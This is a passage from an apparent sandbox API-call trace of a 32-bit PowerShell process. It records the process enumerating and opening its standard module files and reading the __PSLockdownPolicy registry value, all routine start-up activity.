ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0149.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x4e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0149.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.947] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0149.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x4f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", lpFilePart=0x0) returned 0x4e [0149.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.948] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x497da680, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x497da680, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0149.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0149.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x41, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40 [0149.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.948] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8100bf6e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8100bf6e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0149.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x42, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", lpFilePart=0x0) returned 0x41 [0149.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.949] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psscheduledjob"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x47 [0149.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x47, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", lpFilePart=0x0) returned 0x46 [0149.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.949] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d794) returned 1 [0149.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0149.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0149.950] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\*"), lpFindFileData=0x5a0d544 | out: lpFindFileData=0x5a0d544*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9e0 [0149.951] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.951] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0149.951] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e285ac0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e285ac0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0149.951] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e285ac0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e285ac0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 0 [0149.951] FindClose (in: hFindFile=0x68e9e0 | out: hFindFile=0x68e9e0) returned 1 [0149.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d504) returned 1 [0149.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d764) returned 1 [0149.952] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0149.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0149.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0149.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0149.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0149.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d50c) returned 1 [0149.952] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x29a73d4 | out: lpFileInformation=0x29a73d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982)) returned 1 [0149.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d508) returned 1 [0149.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d794) returned 1 [0149.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0149.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0149.953] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\*"), lpFindFileData=0x5a0d544 | out: lpFindFileData=0x5a0d544*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9e0 [0149.953] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.953] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e8618, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x9e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0149.953] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e8618, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x9e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 0 [0149.953] FindClose (in: hFindFile=0x68e9e0 | out: hFindFile=0x68e9e0) returned 1 [0149.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d504) returned 1 [0149.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d764) returned 1 [0149.954] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0149.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0149.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0149.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0149.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0149.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d50c) returned 1 [0149.954] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x29a7b98 | out: lpFileInformation=0x29a7b98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e8618, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x9e9)) returned 1 [0149.954] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d508) returned 1 [0149.954] CoCreateGuid (in: pguid=0x5a0d7dc | out: pguid=0x5a0d7dc*(Data1=0xf5d8f2c9, Data2=0x6a48, Data3=0x4ac9, Data4=([0]=0x8d, [1]=0x75, [2]=0xe9, [3]=0xff, [4]=0x93, [5]=0x70, [6]=0xdc, [7]=0xf3))) returned 0x0 [0149.955] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d0 [0149.955] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x40c [0149.955] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4 [0149.955] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f8 [0149.955] SetEvent (hEvent=0x3f8) returned 1 [0149.956] SetEvent (hEvent=0x3d0) returned 1 [0149.956] SetEvent (hEvent=0x40c) returned 1 [0149.956] SetEvent (hEvent=0x3f4) returned 1 [0149.956] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f0 [0149.956] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.957] EtwEventActivityIdControl () returned 0x0 [0149.958] EtwEventActivityIdControl () returned 0x0 [0149.958] EtwEventActivityIdControl () returned 0x0 [0149.967] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0149.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0149.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0149.969] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d008) returned 1 [0149.969] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0d2cc | out: lpFileInformation=0x5a0d2cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e8618, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x9e9)) returned 1 [0149.969] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d004) returned 1 [0149.969] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0149.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0149.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0149.970] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x5a0cf10, Length=0x20, ResultLength=0x5a0cf80 | out: SystemInformation=0x5a0cf10, ResultLength=0x5a0cf80*=0x0) returned 0xc0000003 [0149.970] GetSystemInfo (in: lpSystemInfo=0x5a0cf8c | out: lpSystemInfo=0x5a0cf8c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0149.970] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0cf1c | out: phkResult=0x5a0cf1c*=0x410) returned 0x0 [0149.971] RegQueryValueExW (in: hKey=0x410, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x5a0cf38, lpData=0x0, lpcbData=0x5a0cf34*=0x0 | out: lpType=0x5a0cf38*=0x0, lpData=0x0, lpcbData=0x5a0cf34*=0x0) returned 0x2 [0149.971] RegCloseKey (hKey=0x410) returned 0x0 [0149.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0149.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0149.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ce94) returned 1 [0149.971] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x410 [0149.972] GetFileType (hFile=0x410) returned 0x1 [0149.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0ce90) returned 1 [0149.972] GetFileType (hFile=0x410) returned 0x1 [0149.972] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, 